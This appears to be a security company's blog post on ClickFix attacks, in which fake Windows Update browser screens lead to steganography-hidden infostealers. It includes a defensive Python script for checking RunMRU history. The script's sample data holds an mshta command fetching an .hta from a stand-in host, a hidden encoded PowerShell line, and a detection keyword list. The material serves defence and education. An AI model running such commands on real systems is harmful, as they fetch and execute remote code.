Recently, new variants of the ClickFix attack have been detected, where cybercriminals display a fake full-screen Windows Update animation within the browser. At first glance, it looks like a legitimate update, but behind the scenes, malicious code is hidden inside images.
Essentially, ClickFix is a social engineering attack: the user is tricked into copying and running commands in the Windows Command Prompt, which silently triggers the malware installation.
What’s concerning is that this method has become very popular among attackers, from beginners to advanced groups. It is effective enough that the tactics keep evolving, with increasingly polished and convincing decoys designed to lure users into the trap.
Some ClickFix variants use a highly convincing trick: displaying a supposed “critical Windows security update” in full-screen mode within the browser. In other cases, it’s even combined with the classic “human verification” prompt, making the whole setup seem completely legitimate.
This fake screen guides the victim step by step, instructing them to press certain keys in a specific order. What many don’t realize is that the page has already copied dangerous commands to the clipboard using JavaScript. By following the instructions, the user ends up pasting and executing those commands unknowingly, giving the attacker direct access to run malware on the system.
Fake windows security update screen (Source: BleepingComputer)
The new variants of ClickFix are exhibiting much more aggressive behavior: they now install information stealers like LummaC2 and Rhadamanthys, two of the most commonly used infostealers in recent campaigns.
In some cases, attackers use the typical “human verification” page; in others, the trap is a fake Windows Update screen. While the visual trick may vary, the goal remains the same: to get the user to accidentally execute the code that triggers the infection.
What stands out the most is that the final malware doesn’t arrive as a traditional executable file, but rather hidden inside an image using steganography. Instead of adding suspicious data to the file, the malicious code is embedded directly into the pixels of the PNG, using specific color channels to reconstruct and decrypt the payload in memory.
The attack begins by using mshta, a legitimate Windows tool, to execute malicious JavaScript. From there, the process goes through several stages combining PowerShell with a .NET assembly known as Stego Loader, which is responsible for extracting the hidden payload from the encrypted PNG.
This Stego Loader contains, in its internal resources, an AES-encrypted block that is actually the steganographic PNG file. From there, it reconstructs shellcode using custom C#.
Adding to this is an evasion technique known as ctrampoline. Essentially, the program’s initial function starts calling thousands of empty functions—literally around 10,000—to confuse analysis and make detection by security tools more difficult.
ctrampoline call chain (Source: Huntress)
The shellcode extracted directly from the encrypted image carries the infostealer samples packed with Donut, a widely used tool for loading files such as VBScript, JScript, EXE, DLL, or .NET assemblies into memory without writing them to disk.
Once the package is unpacked, the complete malware can be recovered. In the analyzed cases, the identified variants were LummaC2 and Rhadamanthys—two infostealers known for their ability to steal credentials, browser data, and other sensitive information.
Below is a diagram that visually summarizes how the entire attack is carried out:
Attack Overview (Source: Huntress)
The Rhadamanthys variant that used the fake Windows Update screen began appearing in early October. Shortly after, in November, part of the malware’s infrastructure was taken down following Operation Endgame. This halted the distribution of the malicious payload from the domains impersonating Windows Update, although those sites remain online.
At TecnetOne, we remind users that avoiding ClickFix-style attacks requires applying very simple yet effective preventive measures: disabling the Windows “Run” dialog on machines where it’s not needed, and monitoring suspicious processes—such as explorer.exe launching mshta.exe or unexpected PowerShell executions.
Additionally, if there’s a need to investigate a potential incident, one of the first useful checks is reviewing the RunMRU registry key, which stores a history of commands executed from the “Run” dialog. This can reveal whether the user pasted or ran any commands that may have triggered the infection.
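The RunMRU check above can be scripted for triage. The following is an added example, not code from the original article or from Huntress: it parses a regedit-style text export of the key (under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, where each one-letter value holds a command ending in "\1" and the MRUList value gives the most-recent-first order), rebuilds the history in execution order, and flags entries that match the mshta/PowerShell chain described in this article. The export text and its commands are constructed sample data.

```python
import re

# Constructed sample of the RunMRU key in regedit .reg export form. The key path and
# value layout (one-letter value names, commands ending in "\1", MRUList ordering the
# slots most-recent-first) are the real Windows format; the commands are made up.
SAMPLE_REG_EXPORT = r'''
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU]
"a"="notepad\\1"
"b"="mshta https://update-check.invalid/verify.hta\\1"
"c"="powershell -w hidden -enc BASE64-PLACEHOLDER\\1"
"MRUList"="cba"
'''

# Triage markers for the ClickFix chain discussed above (mshta, PowerShell, encoded or
# hidden-window invocations). Deliberately broad: a human reviews every hit.
SUSPICIOUS_MARKERS = ("mshta", "powershell", "-enc", "hidden")

_VALUE_RE = re.compile(r'^"([^"]+)"="(.*)"$')


def _unescape(reg_string: str) -> str:
    # Undo .reg string escaping: \" becomes " and a doubled backslash becomes one.
    return reg_string.replace('\\"', '"').replace("\\\\", "\\")


def parse_runmru(reg_text: str) -> list[str]:
    """Return the Run-dialog history, most recent first, as clean command strings."""
    values = {}
    for line in reg_text.splitlines():
        m = _VALUE_RE.match(line.strip())
        if m:
            values[m.group(1)] = _unescape(m.group(2))
    history = []
    for slot in values.get("MRUList", ""):  # letters are ordered most-recent-first
        cmd = values.get(slot)
        if cmd is None:
            continue  # MRUList can reference a slot that was never written
        history.append(cmd[:-2] if cmd.endswith("\\1") else cmd)
    return history


def flag_suspicious(history: list[str]) -> list[str]:
    """Keep only history entries containing any triage marker (case-insensitive)."""
    return [c for c in history if any(mk in c.lower() for mk in SUSPICIOUS_MARKERS)]


if __name__ == "__main__":
    history = parse_runmru(SAMPLE_REG_EXPORT)
    for cmd in history:
        print(cmd)
    print("flagged:", flag_suspicious(history))
```

On a live system, export the key with `reg export` and feed the file to parse_runmru; an empty or absent MRUList simply yields an empty history.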
The ClickFix attack, disguised as a Windows update, shows just how creative cybercriminals can be when it comes to tricking users. If you see an “update” in your browser asking you to run commands or press keys outside the official Windows Update panel, be immediately suspicious and don’t follow any instructions.
At TecnetOne, we recommend maintaining a preventive posture: educate users, block unauthorized commands, filter malicious content, monitor suspicious processes, and keep backups up to date. And if you believe you’ve been a victim of an attack like this, contact us—our incident response service can help you contain, analyze, and resolve the issue so you can get back to operating safely.